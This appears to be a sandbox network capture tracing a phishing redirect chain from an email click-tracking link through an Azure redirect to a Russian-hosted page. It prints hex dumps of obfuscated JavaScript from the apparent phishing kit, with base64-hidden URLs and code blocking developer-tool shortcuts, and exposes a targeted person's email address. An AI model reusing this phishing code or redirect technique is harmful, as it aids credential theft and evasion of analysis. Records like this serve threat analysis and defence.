                                        Feb 15, 2025 20:34:40.378592014 CET192.168.2.41.1.1.10x535aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:40.378730059 CET192.168.2.41.1.1.10xd392Standard query (0)www.google.com65IN (0x0001)false
                                        Feb 15, 2025 20:34:43.265341997 CET192.168.2.41.1.1.10x412cStandard query (0)u40362724.ct.sendgrid.netA (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:43.265512943 CET192.168.2.41.1.1.10x549bStandard query (0)u40362724.ct.sendgrid.net65IN (0x0001)false
                                        Feb 15, 2025 20:34:44.444955111 CET192.168.2.41.1.1.10x71cfStandard query (0)3484378239874382399-f4g8bka8hcb2hwfu.z02.azurefd.netA (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:44.445399046 CET192.168.2.41.1.1.10xd15aStandard query (0)3484378239874382399-f4g8bka8hcb2hwfu.z02.azurefd.net65IN (0x0001)false
                                        Feb 15, 2025 20:34:46.144181013 CET192.168.2.41.1.1.10x4146Standard query (0)nr3hz5fbqd.bazefrost.ruA (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:46.144622087 CET192.168.2.41.1.1.10x93fcStandard query (0)nr3hz5fbqd.bazefrost.ru65IN (0x0001)false
                                        Feb 15, 2025 20:34:47.625988960 CET192.168.2.41.1.1.10x93caStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:47.626121044 CET192.168.2.41.1.1.10x9fc5Standard query (0)code.jquery.com65IN (0x0001)false
                                        Feb 15, 2025 20:34:47.633553028 CET192.168.2.41.1.1.10xa2f2Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:47.633832932 CET192.168.2.41.1.1.10xd315Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                        Feb 15, 2025 20:34:47.634933949 CET192.168.2.41.1.1.10x16c7Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:47.635121107 CET192.168.2.41.1.1.10xba81Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                        Feb 15, 2025 20:34:48.403486013 CET192.168.2.41.1.1.10x7576Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:48.403697014 CET192.168.2.41.1.1.10x9f8aStandard query (0)code.jquery.com65IN (0x0001)false
                                        Feb 15, 2025 20:34:48.457967043 CET192.168.2.41.1.1.10x145fStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:48.458221912 CET192.168.2.41.1.1.10x1ec1Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                        Feb 15, 2025 20:34:48.934983969 CET192.168.2.41.1.1.10xb9d7Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:48.935132980 CET192.168.2.41.1.1.10xbdc5Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                        Feb 15, 2025 20:34:49.024163961 CET192.168.2.41.1.1.10x8810Standard query (0)developers.cloudflare.comA (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:49.024491072 CET192.168.2.41.1.1.10x4849Standard query (0)developers.cloudflare.com65IN (0x0001)false
                                        Feb 15, 2025 20:34:50.159159899 CET192.168.2.41.1.1.10x3781Standard query (0)developers.cloudflare.comA (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:50.159409046 CET192.168.2.41.1.1.10x889aStandard query (0)developers.cloudflare.com65IN (0x0001)false
                                        Feb 15, 2025 20:35:00.438548088 CET192.168.2.41.1.1.10x4bccStandard query (0)gnfsjz.syfn-f.ruA (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:35:00.438549042 CET192.168.2.41.1.1.10xd76fStandard query (0)gnfsjz.syfn-f.ru65IN (0x0001)false
                                        Feb 15, 2025 20:35:02.272708893 CET192.168.2.41.1.1.10xac5eStandard query (0)gnfsjz.syfn-f.ruA (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:35:02.272824049 CET192.168.2.41.1.1.10x61eeStandard query (0)gnfsjz.syfn-f.ru65IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Feb 15, 2025 20:34:40.696803093 CET1.1.1.1192.168.2.40xd392No error (0)www.google.com65IN (0x0001)false
                                        Feb 15, 2025 20:34:40.697434902 CET1.1.1.1192.168.2.40x535aNo error (0)www.google.com172.217.16.196A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:43.274924994 CET1.1.1.1192.168.2.40x412cNo error (0)u40362724.ct.sendgrid.net167.89.118.118A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:43.274924994 CET1.1.1.1192.168.2.40x412cNo error (0)u40362724.ct.sendgrid.net167.89.118.74A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:43.274924994 CET1.1.1.1192.168.2.40x412cNo error (0)u40362724.ct.sendgrid.net167.89.118.28A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:43.274924994 CET1.1.1.1192.168.2.40x412cNo error (0)u40362724.ct.sendgrid.net167.89.123.60A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:43.274924994 CET1.1.1.1192.168.2.40x412cNo error (0)u40362724.ct.sendgrid.net167.89.118.35A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:43.274924994 CET1.1.1.1192.168.2.40x412cNo error (0)u40362724.ct.sendgrid.net167.89.123.64A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:43.274924994 CET1.1.1.1192.168.2.40x412cNo error (0)u40362724.ct.sendgrid.net167.89.123.122A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:43.274924994 CET1.1.1.1192.168.2.40x412cNo error (0)u40362724.ct.sendgrid.net167.89.118.126A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:43.274924994 CET1.1.1.1192.168.2.40x412cNo error (0)u40362724.ct.sendgrid.net167.89.118.23A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:43.274924994 CET1.1.1.1192.168.2.40x412cNo error (0)u40362724.ct.sendgrid.net167.89.118.106A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:43.274924994 CET1.1.1.1192.168.2.40x412cNo error (0)u40362724.ct.sendgrid.net167.89.118.31A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:43.274924994 CET1.1.1.1192.168.2.40x412cNo error (0)u40362724.ct.sendgrid.net167.89.123.16A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:43.274924994 CET1.1.1.1192.168.2.40x412cNo error (0)u40362724.ct.sendgrid.net167.89.123.53A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:43.274924994 CET1.1.1.1192.168.2.40x412cNo error (0)u40362724.ct.sendgrid.net167.89.123.78A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:43.274924994 CET1.1.1.1192.168.2.40x412cNo error (0)u40362724.ct.sendgrid.net167.89.123.77A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:43.274924994 CET1.1.1.1192.168.2.40x412cNo error (0)u40362724.ct.sendgrid.net167.89.123.147A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:44.470021963 CET1.1.1.1192.168.2.40xd15aNo error (0)3484378239874382399-f4g8bka8hcb2hwfu.z02.azurefd.netshed.dual-low.s-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                        Feb 15, 2025 20:34:44.470722914 CET1.1.1.1192.168.2.40x71cfNo error (0)3484378239874382399-f4g8bka8hcb2hwfu.z02.azurefd.netshed.dual-low.s-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                        Feb 15, 2025 20:34:44.470722914 CET1.1.1.1192.168.2.40x71cfNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                        Feb 15, 2025 20:34:44.470722914 CET1.1.1.1192.168.2.40x71cfNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:46.153994083 CET1.1.1.1192.168.2.40x4146No error (0)nr3hz5fbqd.bazefrost.ru172.67.165.90A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:46.153994083 CET1.1.1.1192.168.2.40x4146No error (0)nr3hz5fbqd.bazefrost.ru104.21.91.28A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:46.192157984 CET1.1.1.1192.168.2.40x93fcNo error (0)nr3hz5fbqd.bazefrost.ru65IN (0x0001)false
                                        Feb 15, 2025 20:34:47.633181095 CET1.1.1.1192.168.2.40x93caNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:47.633181095 CET1.1.1.1192.168.2.40x93caNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:47.633181095 CET1.1.1.1192.168.2.40x93caNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:47.633181095 CET1.1.1.1192.168.2.40x93caNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:47.641371965 CET1.1.1.1192.168.2.40xa2f2No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:47.641371965 CET1.1.1.1192.168.2.40xa2f2No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:47.641843081 CET1.1.1.1192.168.2.40x16c7No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:47.641843081 CET1.1.1.1192.168.2.40x16c7No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:47.642153978 CET1.1.1.1192.168.2.40xd315No error (0)challenges.cloudflare.com65IN (0x0001)false
                                        Feb 15, 2025 20:34:47.642648935 CET1.1.1.1192.168.2.40xba81No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                        Feb 15, 2025 20:34:48.410582066 CET1.1.1.1192.168.2.40x7576No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:48.410582066 CET1.1.1.1192.168.2.40x7576No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:48.410582066 CET1.1.1.1192.168.2.40x7576No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:48.410582066 CET1.1.1.1192.168.2.40x7576No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:48.464711905 CET1.1.1.1192.168.2.40x145fNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:48.464711905 CET1.1.1.1192.168.2.40x145fNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:48.464768887 CET1.1.1.1192.168.2.40x1ec1No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                        Feb 15, 2025 20:34:48.942409039 CET1.1.1.1192.168.2.40xb9d7No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:48.942409039 CET1.1.1.1192.168.2.40xb9d7No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:48.942670107 CET1.1.1.1192.168.2.40xbdc5No error (0)challenges.cloudflare.com65IN (0x0001)false
                                        Feb 15, 2025 20:34:49.033453941 CET1.1.1.1192.168.2.40x8810No error (0)developers.cloudflare.com104.16.2.189A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:49.033453941 CET1.1.1.1192.168.2.40x8810No error (0)developers.cloudflare.com104.16.3.189A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:49.033453941 CET1.1.1.1192.168.2.40x8810No error (0)developers.cloudflare.com104.16.6.189A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:49.033453941 CET1.1.1.1192.168.2.40x8810No error (0)developers.cloudflare.com104.16.4.189A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:49.033453941 CET1.1.1.1192.168.2.40x8810No error (0)developers.cloudflare.com104.16.5.189A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:49.034516096 CET1.1.1.1192.168.2.40x4849No error (0)developers.cloudflare.com65IN (0x0001)false
                                        Feb 15, 2025 20:34:50.166584969 CET1.1.1.1192.168.2.40x3781No error (0)developers.cloudflare.com104.16.2.189A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:50.166584969 CET1.1.1.1192.168.2.40x3781No error (0)developers.cloudflare.com104.16.5.189A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:50.166584969 CET1.1.1.1192.168.2.40x3781No error (0)developers.cloudflare.com104.16.4.189A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:50.166584969 CET1.1.1.1192.168.2.40x3781No error (0)developers.cloudflare.com104.16.6.189A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:50.166584969 CET1.1.1.1192.168.2.40x3781No error (0)developers.cloudflare.com104.16.3.189A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:34:50.168483019 CET1.1.1.1192.168.2.40x889aNo error (0)developers.cloudflare.com65IN (0x0001)false
                                        Feb 15, 2025 20:35:00.498707056 CET1.1.1.1192.168.2.40xd76fNo error (0)gnfsjz.syfn-f.ru65IN (0x0001)false
                                        Feb 15, 2025 20:35:00.529318094 CET1.1.1.1192.168.2.40x4bccNo error (0)gnfsjz.syfn-f.ru188.114.97.3A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:35:00.529318094 CET1.1.1.1192.168.2.40x4bccNo error (0)gnfsjz.syfn-f.ru188.114.96.3A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:35:02.288419008 CET1.1.1.1192.168.2.40xac5eNo error (0)gnfsjz.syfn-f.ru188.114.96.3A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:35:02.288419008 CET1.1.1.1192.168.2.40xac5eNo error (0)gnfsjz.syfn-f.ru188.114.97.3A (IP address)IN (0x0001)false
                                        Feb 15, 2025 20:35:02.292615891 CET1.1.1.1192.168.2.40x61eeNo error (0)gnfsjz.syfn-f.ru65IN (0x0001)false
                                        • u40362724.ct.sendgrid.net
                                        • 3484378239874382399-f4g8bka8hcb2hwfu.z02.azurefd.net
                                        • https:
                                          • nr3hz5fbqd.bazefrost.ru
                                          • challenges.cloudflare.com
                                          • code.jquery.com
                                          • cdnjs.cloudflare.com
                                          • developers.cloudflare.com
                                          • gnfsjz.syfn-f.ru
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.449742167.89.118.1184432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-02-15 19:34:44 UTC1131OUTGET /ls/click?upn=u001.AIAIIgsR9DYpfnDcYDDcB-2FH04-2Bw15hWv-2FQG9f9GyYMxoYZI0EMTcIFGlnLUMJaeXWfQkso8L0Pg22-2BN8Dl4SKkuGQK4LTBd6SrqGD16fuglHjKig9IdCQX6kMIoCbc3imWzJ6J5j-2FI5R1ZDT-2B3iVLs5XrdQdThvrNWcCC8-2BXszs-3DKCL7_KLIoTjFO40Z9pcySq7dJvP-2F4O0bxgkCEKrPbe9NcB9Lnt29GChfkzS40U4uEPnofQsSlowwfYWZWBouhSAGJhhutvfyEjm-2BohUBd9188ex3rH7ZinpIlHQnKRLKcL-2BuAMKPlmABiKh2Tl-2BWQVbtTYLLXzrZM1krN4q6Oas8IZF3K-2FKbiIWoKNYJ7gqMqxovcHmf5LD0qaDj1zFO-2BleUBdSw3rWLCtQW4Pj3WQVw-2Bx60-3D HTTP/1.1
                                        Host: u40362724.ct.sendgrid.net
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-User: ?1
                                        Sec-Fetch-Dest: document
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-02-15 19:34:44 UTC316INHTTP/1.1 302 Found
                                        Server: nginx
                                        Date: Sat, 15 Feb 2025 19:34:44 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Content-Length: 140
                                        Connection: close
                                        Location: https://3484378239874382399-f4g8bka8hcb2hwfu.z02.azurefd.net/7329508157/hDzYdBaPJp/robin.kaufman@atlanticaviation.com
                                        X-Robots-Tag: noindex, nofollow
                                        2025-02-15 19:34:44 UTC140INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 33 34 38 34 33 37 38 32 33 39 38 37 34 33 38 32 33 39 39 2d 66 34 67 38 62 6b 61 38 68 63 62 32 68 77 66 75 2e 7a 30 32 2e 61 7a 75 72 65 66 64 2e 6e 65 74 2f 37 33 32 39 35 30 38 31 35 37 2f 68 44 7a 59 64 42 61 50 4a 70 2f 72 6f 62 69 6e 2e 6b 61 75 66 6d 61 6e 40 61 74 6c 61 6e 74 69 63 61 76 69 61 74 69 6f 6e 2e 63 6f 6d 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                        Data Ascii: <a href="https://3484378239874382399-f4g8bka8hcb2hwfu.z02.azurefd.net/7329508157/hDzYdBaPJp/robin.kaufman@atlanticaviation.com">Found</a>.


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.44974413.107.246.454432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-02-15 19:34:45 UTC751OUTGET /7329508157/hDzYdBaPJp/robin.kaufman@atlanticaviation.com HTTP/1.1
                                        Host: 3484378239874382399-f4g8bka8hcb2hwfu.z02.azurefd.net
                                        Connection: keep-alive
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-User: ?1
                                        Sec-Fetch-Dest: document
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-02-15 19:34:46 UTC380INHTTP/1.1 404 The requested content does not exist.
                                        Date: Sat, 15 Feb 2025 19:34:46 GMT
                                        Content-Type: text/html
                                        Content-Length: 1335
                                        Connection: close
                                        x-ms-error-code: WebContentNotFound
                                        x-ms-request-id: 05a5a38d-d01e-0002-44e0-7f3a9a000000
                                        x-ms-version: 2018-03-28
                                        x-azure-ref: 20250215T193445Z-1868d69f86fcck4zhC1EWRgyyn0000000w40000000000gy7
                                        X-Cache: CONFIG_NOCACHE
                                        2025-02-15 19:34:46 UTC1335INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 49 6e 73 74 61 6e 74 20 52 65 64 69 72 65 63 74 20 53 63 72 69 70 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 2f 2f 20 46 75 6e 63 74 69 6f 6e 20 74 6f 20 67 65 6e 65 72 61 74 65 20 72 61 6e 64 6f 6d 20 61 6c 70 68 61 6e 75 6d 65 72 69
                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Instant Redirect Script</title> <script> // Function to generate random alphanumeri


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.449746172.67.165.904432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-02-15 19:34:46 UTC733OUTGET /liceYCYL/ HTTP/1.1
                                        Host: nr3hz5fbqd.bazefrost.ru
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-Dest: document
                                        Referer: https://3484378239874382399-f4g8bka8hcb2hwfu.z02.azurefd.net/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-02-15 19:34:47 UTC1252INHTTP/1.1 200 OK
                                        Date: Sat, 15 Feb 2025 19:34:47 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Cache-Control: no-cache, private
                                        cf-cache-status: DYNAMIC
                                        vary: accept-encoding
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tVBh3YVH4Ot0f8kgwUKBC%2FNLrhBToHRLFJDnt77yXiYzwaSuzz7uw6WqKu4IRZzGdGjlL3Gh617yoYWiEGc%2BQtM2wzgcZswR0SVNJaMi%2B%2Fse5U2rH1ROEyIESgMQCmqsQ2ZbbQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1061&min_rtt=1034&rtt_var=313&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1643&delivery_rate=2639927&cwnd=243&unsent_bytes=0&cid=b2aa429dd2514f82&ts=174&x=0"
                                        Set-Cookie: XSRF-TOKEN=eyJpdiI6Imgrb0hxVzRtYzZMejdXR2trd2I2RWc9PSIsInZhbHVlIjoidzVCd0R2Nk9CTDBsbGhOaTQvRkMrbVFMYWM0aVpHejRMK0toS3BBeW9yeEZZYjRkY2hGUC9HUkpoRTc2KzEzV2xPc0xoS2xZUjZlVlVKWDJNOGJTWVJoaDhuOXJCK0pDZXVaajVncXJBcGZUbDA4M0Y1SjJaaHkzaHlNdTVYdGgiLCJtYWMiOiIyNmVmMzZlODk1YTZjOTQxZWM0YmIzYmZiMDA3ZWE3N2VjZTM0MGE4MjM3YmVmMmZlOTFkZDMwMWNkY2ViYmM5IiwidGFnIjoiIn0%3D; expires=Sat, 15-Feb-2025 21:34:47 GMT; Max-Age=7200; path=/; secure; samesite=none
                                        2025-02-15 19:34:47 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 42 47 51 53 39 6b 56 45 78 59 4f 54 68 73 62 48 64 58 61 58 52 36 54 6b 31 42 53 6e 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 59 33 68 43 5a 55 68 35 4d 6b 56 75 63 48 64 6b 62 30 38 30 56 56 56 50 52 6e 52 56 4b 32 39 42 62 6d 56 4b 56 31 6c 49 52 6a 68 4a 64 45 78 6c 4f 47 39 72 63 6b 6c 31 52 54 68 4b 4e 55 78 6d 4d 6d 34 78 52 30 78 4f 61 6c 46 72 4e 30 5a 74 54 7a 45 76 56 54 5a 6f 5a 54 64 4d 61 6b 34 32 4f 48 56 75 4d 47 51 77 64 30 39 34 61 33 51 78 4d 56 56 70 4e 45 6c 48 4d 54 52 4f 53 44 56 30 51 6b 78 4a 4d 79 39 6f 51 6b 52 5a 56 32 6b 7a 64 44 4a 53 4e 31 55 78 62 54 42 72 65 57 4a 77 5a 56 41 34 52 57 49 32 65 45 30
                                        Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlBGQS9kVExYOThsbHdXaXR6Tk1BSnc9PSIsInZhbHVlIjoiY3hCZUh5MkVucHdkb080VVVPRnRVK29BbmVKV1lIRjhJdExlOG9rckl1RThKNUxmMm4xR0xOalFrN0ZtTzEvVTZoZTdMak42OHVuMGQwd094a3QxMVVpNElHMTROSDV0QkxJMy9oQkRZV2kzdDJSN1UxbTBreWJwZVA4RWI2eE0
                                        2025-02-15 19:34:47 UTC1369INData Raw: 35 37 35 36 0d 0a 3c 21 2d 2d 20 44 6f 6e 26 23 30 33 39 3b 74 20 77 61 74 63 68 20 74 68 65 20 63 6c 6f 63 6b 3b 20 64 6f 20 77 68 61 74 20 69 74 20 64 6f 65 73 2e 20 4b 65 65 70 20 67 6f 69 6e 67 2e 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 2f 2a 20 54 68 65 20 6f 6e 6c 79 20 77 61 79 20 74 6f 20 64 6f 20 67 72 65 61 74 20 77 6f 72 6b 20 69 73 20 74 6f 20 6c 6f 76 65 20 77 68 61 74 20 79 6f 75 20 64 6f 2e 20 2a 2f 0a 65 42 4e 59 66 61 69 79 66 6b 20 3d 20 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 59 61 33 45 32 4c 6d 4a 68 65 6d 56 6d 63 6d 39 7a 64 43 35 79 64 53 39 73 61 57 4e 6c 57 55 4e 5a 54 43 38 3d 22 29 3b 0a 64 76 75 73 6a 71 4f 6e 76 59 20 3d 20 61 74 6f 62 28 22 62 6d 39 74 59 58 52 6a 61 41 3d 3d 22 29 3b 0a 69 66 28 65 42 4e 59 66
                                        Data Ascii: 5756... Don&#039;t watch the clock; do what it does. Keep going. --><script>/* The only way to do great work is to love what you do. */eBNYfaiyfk = atob("aHR0cHM6Ly9Ya3E2LmJhemVmcm9zdC5ydS9saWNlWUNZTC8=");dvusjqOnvY = atob("bm9tYXRjaA==");if(eBNYf
                                        2025-02-15 19:34:47 UTC1369INData Raw: 54 30 67 4e 7a 4d 70 49 48 78 38 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 63 32 68 70 5a 6e 52 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4e 6a 63 70 49 48 78 38 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 63 32 68 70 5a 6e 52 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4e 7a 51 70 49 48 78 38 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 63 32 68 70 5a 6e 52 4c 5a 58 6b 67 4a 69 59 67
                                        Data Ascii: T0gNzMpIHx8CiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNjcpIHx8CiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzQpIHx8CiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYg
